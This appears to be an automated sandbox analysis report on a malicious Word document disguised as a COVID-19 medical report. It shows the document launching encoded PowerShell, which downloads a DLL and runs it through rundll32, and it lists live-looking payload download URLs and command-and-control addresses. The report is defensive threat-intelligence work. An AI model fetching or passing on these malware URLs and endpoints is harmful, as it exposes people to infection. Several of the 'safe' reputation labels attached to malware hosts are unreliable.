Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006D1F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information21LSASS MemoryFile and Directory Discovery3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsNative API2Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSSecurity Software Discovery21Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
Cloud AccountsCommand and Scripting Interpreter111Network Logon ScriptNetwork Logon ScriptMasquerading21LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol14Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaPowerShell4Rc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection111DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 332936 Sample: GT-9333 Medical report COVI... Startdate: 21/12/2020 Architecture: WINDOWS Score: 100 46 Antivirus detection for URL or domain 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->50 52 9 other signatures 2->52 9 cmd.exe 2->9         started        12 WINWORD.EXE 436 30 2->12         started        process3 signatures4 56 Suspicious powershell command line found 9->56 58 Very long command line found 9->58 60 Encrypted powershell cmdline option found 9->60 62 PowerShell case anomaly found 9->62 14 powershell.exe 12 9 9->14         started        19 msg.exe 9->19         started        process5 dnsIp6 38 transfersuvan.com 186.64.117.145, 49170, 80 ZAMLTDACL Chile 14->38 40 arquivopop.com.br 191.6.208.18, 49169, 80 IPV6InternetLtdaBR Brazil 14->40 42 2 other IPs or domains 14->42 30 C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll, PE32 14->30 dropped 44 Powershell drops PE file 14->44 21 rundll32.exe 14->21         started        file7 signatures8 process9 process10 23 rundll32.exe 2 21->23         started        signatures11 54 Hides that the sample has been downloaded from the Internet (zone.identifier) 23->54 26 rundll32.exe 9 23->26         started        process12 dnsIp13 32 50.116.111.59, 49174, 8080 UNIFIEDLAYER-AS-1US United States 26->32 34 78.188.225.105, 80 TTNETTR Turkey 26->34 36 197.87.160.216, 80 OPTINETZA South Africa 26->36 64 System process connects to network (likely due to code injection or exploit) 26->64 signatures14

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
GT-9333 Medical report COVID-19.doc25%ReversingLabsDocument-Word.Downloader.Heuristic

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll100%Joe Sandbox ML

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
8.2.rundll32.exe.2e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
7.2.rundll32.exe.200000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://arquivopop.com.br/index_htm_files/Kxh/0%Avira URL Cloudsafe
http://hotelshivansh.com/UserFiles/8/100%Avira URL Cloudmalware
http://transfersuvan.com0%Avira URL Cloudsafe
https://www.isatechnology.com/training/b/0%Avira URL Cloudsafe
http://transfersuvan.com/wp-admin/OVl/0%Avira URL Cloudsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
https://www.isatechnology.comp0%Avira URL Cloudsafe
https://cairocad.com/cgi-bin/1PBB/0%Avira URL Cloudsafe
https://physio-svdh.ch/wp-admin/kK/0%Avira URL Cloudsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
https://physio-svdh.ch/wp-admin/kK/P0%Avira URL Cloudsafe
http://arquivopop.com.br0%Avira URL Cloudsafe
http://50.116.111.59:8080/zikye087/k6io5sui3jj27i90cer/zipbonjrmr/0%Avira URL Cloudsafe
https://www.isatechnology.com0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://ownitconsignment.com/files/b/100%Avira URL Cloudmalware
https://b2bcom.com.br/site/0H/100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
isatechnology.com
35.208.182.43
truetrue
    unknown
    arquivopop.com.br
    191.6.208.18
    truetrue
      unknown
      transfersuvan.com
      186.64.117.145
      truetrue
        unknown
        www.isatechnology.com
        unknown
        unknowntrue
          unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://arquivopop.com.br/index_htm_files/Kxh/true
          • Avira URL Cloud: safe
          unknown
          http://transfersuvan.com/wp-admin/OVl/true
          • Avira URL Cloud: safe
          unknown
          http://50.116.111.59:8080/zikye087/k6io5sui3jj27i90cer/zipbonjrmr/true
          • Avira URL Cloud: safe
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmpfalse
            high
            http://investor.msn.comrundll32.exe, 00000006.00000002.2118831975.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116184813.0000000002080000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmpfalse
              high
              http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2118831975.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116184813.0000000002080000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmpfalse
                high
                http://hotelshivansh.com/UserFiles/8/powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://transfersuvan.compowershell.exe, 00000005.00000002.2116801238.00000000031E1000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://www.isatechnology.com/training/b/powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2120753014.000000001B5AE000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2119754423.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116386799.0000000002267000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349870835.0000000002267000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2118831975.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116184813.0000000002080000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmpfalse
                  high
                  https://www.isatechnology.comppowershell.exe, 00000005.00000002.2120027489.0000000003C53000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cairocad.com/cgi-bin/1PBB/powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2119754423.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116386799.0000000002267000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349870835.0000000002267000.00000002.00000001.sdmpfalse
                    high
                    https://physio-svdh.ch/wp-admin/kK/powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2119754423.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116386799.0000000002267000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349870835.0000000002267000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2113047862.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2117091810.0000000002960000.00000002.00000001.sdmpfalse
                      high
                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2110407873.0000000000114000.00000004.00000020.sdmpfalse
                        high
                        http://investor.msn.com/rundll32.exe, 00000006.00000002.2118831975.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116184813.0000000002080000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmpfalse
                          high
                          https://physio-svdh.ch/wp-admin/kK/Ppowershell.exe, 00000005.00000002.2116517300.0000000002F12000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://arquivopop.com.brpowershell.exe, 00000005.00000002.2116517300.0000000002F12000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2110407873.0000000000114000.00000004.00000020.sdmpfalse
                            high
                            https://www.isatechnology.compowershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://www.%s.comPApowershell.exe, 00000005.00000002.2113047862.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2117091810.0000000002960000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2350370536.0000000002FD0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            low
                            http://ownitconsignment.com/files/b/powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://b2bcom.com.br/site/0H/powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            35.208.182.43
                            unknownUnited States
                            19527GOOGLE-2UStrue
                            78.188.225.105
                            unknownTurkey
                            9121TTNETTRtrue
                            50.116.111.59
                            unknownUnited States
                            46606UNIFIEDLAYER-AS-1UStrue
                            186.64.117.145
                            unknownChile
                            52368ZAMLTDACLtrue
                            197.87.160.216
                            unknownSouth Africa
                            10474OPTINETZAtrue
                            191.6.208.18
                            unknownBrazil
                            28299IPV6InternetLtdaBRtrue

                            General Information

                            Joe Sandbox Version:31.0.0 Red Diamond
                            Analysis ID:332936
                            Start date:21.12.2020
                            Start time:22:12:13
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 7m 36s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:GT-9333 Medical report COVID-19.doc
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:10
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • GSI enabled (VBA)
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.evad.winDOC@12/9@5/6
                            EGA Information:
                            • Successful, ratio: 66.7%
                            HDC Information:
                            • Successful, ratio: 83.6% (good quality ratio 79.4%)
                            • Quality average: 79%
                            • Quality standard deviation: 26.9%
                            HCA Information:
                            • Successful, ratio: 83%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .doc
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Found warning dialog
                            • Click Ok
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                            • TCP Packets have been reduced to 100
                            • Execution Graph export aborted for target powershell.exe, PID 2468 because it is empty
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/332936/sample/GT-9333 Medical report COVID-19.doc

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            22:12:42API Interceptor1x Sleep call for process: msg.exe modified
                            22:12:43API Interceptor76x Sleep call for process: powershell.exe modified
                            22:12:52API Interceptor487x Sleep call for process: rundll32.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            78.188.225.105uebg.dllGet hashmaliciousBrowse
                            • 78.188.225.105/5agilxql196zd2w/al9ytutr5gf2ie78hlr/
                            9182483287326864.docGet hashmaliciousBrowse
                            • 78.188.225.105/z8cxjwmlkoamd9/0uoew5906mpmpfl/xos25qs/2363b92r354o/9g1wcv8omuhf/
                            9182483287326864.docGet hashmaliciousBrowse
                            • 78.188.225.105/6jh2ht/
                            50.116.111.592G18HC8998F36.docGet hashmaliciousBrowse
                            • 50.116.111.59:8080/f0ttde5p/6pa3fz7e/35ronnbuwllcs3rpomc/
                            186.64.117.145New Doc 2020-12-21 09.53.07_8.docGet hashmaliciousBrowse
                            • transfersuvan.com/wp-admin/OVl/
                            https://moraniz.co.il/wp-content/ovFoPY4G24csbGENhcX9yJgYiF/Get hashmaliciousBrowse
                            • transfersuvan.com/wp-admin/OVl/
                            factura fiscala 767958063 14 10 2020.docGet hashmaliciousBrowse
                            • transfersuvan.com/wp-admin/07HDv9jur/
                            9931887458-7-141020.docGet hashmaliciousBrowse
                            • transfersuvan.com/wp-admin/07HDv9jur/
                            Auftrag.docGet hashmaliciousBrowse
                            • transfersuvan.com/wp-admin/07HDv9jur/
                            Rechnung.docGet hashmaliciousBrowse
                            • transfersuvan.com/wp-admin/07HDv9jur/
                            Faktura.docGet hashmaliciousBrowse
                            • transfersuvan.com/wp-admin/07HDv9jur/
                            #U03c4#U03b9#U03bc#U03bf#U03bb#U03bf#U03b3#U03b9#U03bf DQ8192826.docGet hashmaliciousBrowse
                            • transfersuvan.com/wp-admin/07HDv9jur/
                            DES7999474362.docGet hashmaliciousBrowse
                            • transfersuvan.com/wp-admin/07HDv9jur/
                            #U03c4#U03b9#U03bc#U03bf#U03bb#U03bf#U03b3#U03b9#U03bf QH6464446.docGet hashmaliciousBrowse
                            • transfersuvan.com/wp-admin/07HDv9jur/
                            #U03c4#U03b9#U03bc#U03bf#U03bb#U03bf#U03b3#U03b9#U03bf R5725893955.docGet hashmaliciousBrowse
                            • transfersuvan.com/wp-admin/07HDv9jur/
                            Auftrag.docGet hashmaliciousBrowse
                            • transfersuvan.com/wp-admin/07HDv9jur/
                            Order.docGet hashmaliciousBrowse
                            • transfersuvan.com/wp-admin/07HDv9jur/
                            rapport.docGet hashmaliciousBrowse
                            • transfersuvan.com/wp-admin/07HDv9jur/
                            KKY9693338788.docGet hashmaliciousBrowse
                            • transfersuvan.com/wp-admin/07HDv9jur/
                            File-O954389.docGet hashmaliciousBrowse
                            • transfersuvan.com/wp-admin/1J/

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            arquivopop.com.brCity Report - December.docGet hashmaliciousBrowse
                            • 191.6.208.18
                            transfersuvan.comNew Doc 2020-12-21 09.53.07_8.docGet hashmaliciousBrowse
                            • 186.64.117.145
                            https://moraniz.co.il/wp-content/ovFoPY4G24csbGENhcX9yJgYiF/Get hashmaliciousBrowse
                            • 186.64.117.145
                            factura fiscala 767958063 14 10 2020.docGet hashmaliciousBrowse
                            • 186.64.117.145
                            9931887458-7-141020.docGet hashmaliciousBrowse
                            • 186.64.117.145
                            Auftrag.docGet hashmaliciousBrowse
                            • 186.64.117.145
                            Rechnung.docGet hashmaliciousBrowse
                            • 186.64.117.145
                            Faktura.docGet hashmaliciousBrowse
                            • 186.64.117.145
                            #U03c4#U03b9#U03bc#U03bf#U03bb#U03bf#U03b3#U03b9#U03bf DQ8192826.docGet hashmaliciousBrowse
                            • 186.64.117.145
                            DES7999474362.docGet hashmaliciousBrowse
                            • 186.64.117.145
                            #U03c4#U03b9#U03bc#U03bf#U03bb#U03bf#U03b3#U03b9#U03bf QH6464446.docGet hashmaliciousBrowse
                            • 186.64.117.145
                            #U03c4#U03b9#U03bc#U03bf#U03bb#U03bf#U03b3#U03b9#U03bf R5725893955.docGet hashmaliciousBrowse
                            • 186.64.117.145
                            Auftrag.docGet hashmaliciousBrowse
                            • 186.64.117.145
                            Order.docGet hashmaliciousBrowse
                            • 186.64.117.145
                            rapport.docGet hashmaliciousBrowse
                            • 186.64.117.145
                            KKY9693338788.docGet hashmaliciousBrowse
                            • 186.64.117.145
                            File-O954389.docGet hashmaliciousBrowse
                            • 186.64.117.145

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            UNIFIEDLAYER-AS-1USBOL_860766.xlsmGet hashmaliciousBrowse
                            • 192.185.211.201
                            2G18HC8998F36.docGet hashmaliciousBrowse
                            • 50.116.111.59
                            Purchase Order 75MF3B84_Pdf.exeGet hashmaliciousBrowse
                            • 192.185.225.203
                            PURCHASE ORDER_PDF.exeGet hashmaliciousBrowse
                            • 192.185.225.203
                            REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                            • 108.179.253.183
                            https://www.northernpropertiesandhomes.com/auth/?mail=feras.alsarraj@test.com.qaGet hashmaliciousBrowse
                            • 162.241.219.35
                            http://www.afsearshc.com.ml.nyerimanah.com/?tty=(bruce.honniball@searshc.com)Get hashmaliciousBrowse
                            • 69.49.228.45
                            https://flcfm.com/sign-on.ce9876/365txtGet hashmaliciousBrowse
                            • 192.185.188.94
                            Payment_Remittance_Advice_Copy_ref426293.xlsGet hashmaliciousBrowse
                            • 192.185.143.100
                            Payment_Remittance_Advice_Copy_ref426293.xlsGet hashmaliciousBrowse
                            • 192.185.143.100
                            Payment_Remittance_Advice_Copy_ref426293.xlsGet hashmaliciousBrowse
                            • 192.185.143.100
                            Payment Po.0000.Scan.pdf....exeGet hashmaliciousBrowse
                            • 192.185.59.247
                            d2mISAbTQN.exeGet hashmaliciousBrowse
                            • 192.185.4.145
                            YT0nfh456s.exeGet hashmaliciousBrowse
                            • 162.241.60.214
                            LETTER OF AUTHORITY 18DEC.xlsxGet hashmaliciousBrowse
                            • 108.167.156.42
                            AUTHORIZATION LETTER.xlsxGet hashmaliciousBrowse
                            • 108.167.156.42
                            https://bbdeck.com/12-18-2020.htmlGet hashmaliciousBrowse
                            • 192.185.138.101
                            https://app.box.com/s/yihmp2wywbz9lgdbg26g3tc1piwkalabGet hashmaliciousBrowse
                            • 162.241.127.156
                            https://offer.rapidecomsolutions.com/download/#1NAFXgyML1ZuG78QPA7kwmkaJ-SrtNRepGet hashmaliciousBrowse
                            • 162.241.218.103
                            Aral#U0131k ekstreniz.exeGet hashmaliciousBrowse
                            • 162.241.225.237
                            TTNETTRchrxWe2r.exeGet hashmaliciousBrowse
                            • 78.171.224.103
                            uebg.dllGet hashmaliciousBrowse
                            • 78.188.225.105
                            9182483287326864.docGet hashmaliciousBrowse
                            • 78.188.225.105
                            2G18HC8998F36.docGet hashmaliciousBrowse
                            • 78.188.225.105
                            9182483287326864.docGet hashmaliciousBrowse
                            • 78.188.225.105
                            sD7HzMzN.exeGet hashmaliciousBrowse
                            • 78.171.224.103
                            ZAgNhZBG.exeGet hashmaliciousBrowse
                            • 78.171.128.82
                            gJkwNm51.exeGet hashmaliciousBrowse
                            • 88.224.226.50
                            Endermanch@Cerber5.exeGet hashmaliciousBrowse
                            • 95.1.200.8
                            Astra.x86Get hashmaliciousBrowse
                            • 85.97.99.131
                            R7dtqfb4.exeGet hashmaliciousBrowse
                            • 78.161.81.149
                            DqO2lhfM6N.exeGet hashmaliciousBrowse
                            • 81.214.253.80
                            mmdOUPawey.exeGet hashmaliciousBrowse
                            • 81.214.253.80
                            AJU2WsPqAg.exeGet hashmaliciousBrowse
                            • 85.97.204.218
                            cCqYU9uftT.exeGet hashmaliciousBrowse
                            • 81.214.253.80
                            YdP4RSFJzO.exeGet hashmaliciousBrowse
                            • 81.214.253.80
                            rn33MSTaLm.exeGet hashmaliciousBrowse
                            • 95.12.200.103
                            710162.exeGet hashmaliciousBrowse
                            • 85.105.29.218
                            X61NNBey.exeGet hashmaliciousBrowse
                            • 88.254.69.150
                            https://theshockley.com/wp-admin/docs/OAarY7U1nrX/Get hashmaliciousBrowse
                            • 81.214.253.80
                            GOOGLE-2USFile_2112_2020_D-774206.docGet hashmaliciousBrowse
                            • 35.209.158.78
                            City Report - December.docGet hashmaliciousBrowse
                            • 35.208.153.170
                            file.exeGet hashmaliciousBrowse
                            • 35.208.121.20
                            https://performoverlyrefinedapplication.icu/CizCEYfXXsFZDea6dskVLfEdY6BHDc59rTngFTpi7WA?clck=d1b1d4dc-5066-446f-b596-331832cbbdd0&sid=l84343Get hashmaliciousBrowse
                            • 35.213.109.249
                            Copy_58M.docGet hashmaliciousBrowse
                            • 35.214.166.219
                            sample.exeGet hashmaliciousBrowse
                            • 35.209.64.252
                            http://perpetual.veteran.az/673616c6c792e64756e6e654070657270657475616c2e636f6d2e6175Get hashmaliciousBrowse
                            • 35.211.168.6
                            iUUJykFNh2.docGet hashmaliciousBrowse
                            • 35.214.68.112
                            iUUJykFNh2.docGet hashmaliciousBrowse
                            • 35.214.68.112
                            Inv__Y20JQ8.docGet hashmaliciousBrowse
                            • 35.214.68.112
                            Inv__Y20JQ8.docGet hashmaliciousBrowse
                            • 35.214.68.112
                            Inv__Y20JQ8.docGet hashmaliciousBrowse
                            • 35.214.68.112
                            Copy__VLWEHK9R.docGet hashmaliciousBrowse
                            • 35.214.68.112
                            Copy_HJ1TCUG.docGet hashmaliciousBrowse
                            • 35.214.68.112
                            Copy_HJ1TCUG.docGet hashmaliciousBrowse
                            • 35.214.68.112
                            Copy_HJ1TCUG.docGet hashmaliciousBrowse
                            • 35.214.68.112
                            Copy_HJ1TCUG.docGet hashmaliciousBrowse
                            • 35.214.68.112
                            Scan BUYX.docGet hashmaliciousBrowse
                            • 35.214.68.112
                            Scan BUYX.docGet hashmaliciousBrowse
                            • 35.214.68.112
                            eYXiYB6U8N.docGet hashmaliciousBrowse
                            • 35.214.68.112

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{78474F9B-DE8E-4300-98F0-AE5841A8170E}.tmp
                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05390218305374581
                            Encrypted:false
                            SSDEEP:3:ol3lYdn:4Wn
                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8389C138-A4A2-4116-9DB9-6D688B84E1DE}.tmp
                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1536
                            Entropy (8bit):1.357318797251612
                            Encrypted:false
                            SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbi:IiiiiiiiiifdLloZQc8++lsJe1Mzx
                            MD5:69C7BA30BCDE3F02A6A6E67AF626A405
                            SHA1:C645BE475B8D182CFE8F4B45D15BD04D0C8CE916
                            SHA-256:4784D522200674BBFB7691E4B11DD7B165C50A13B6F317E9B60324425433702A
                            SHA-512:16BD1C72260FF26B3F8ABD3FC6B256D6417D2E896AEFC4FD92D5A2D133AB58364579616C919B7A7622420CDFAE7DA7B34AF3137ADF8078B00E7A61CBD8E47A83
                            Malicious:false
                            Reputation:low
                            Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):162688
                            Entropy (8bit):4.254407380862302
                            Encrypted:false
                            SSDEEP:1536:C6TL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:COJNSc83tKBAvQVCgOtmXmLpLm4l
                            MD5:1C36AD7F044053F1199A8FF860E7E245
                            SHA1:7CB4A64E9C077582D87AA52AFA67BDCEF33CCF49
                            SHA-256:BC72E1DC3EB86781419640CEE5AB0DAE16B5B4C71E8429F2E6954D2B2760A594
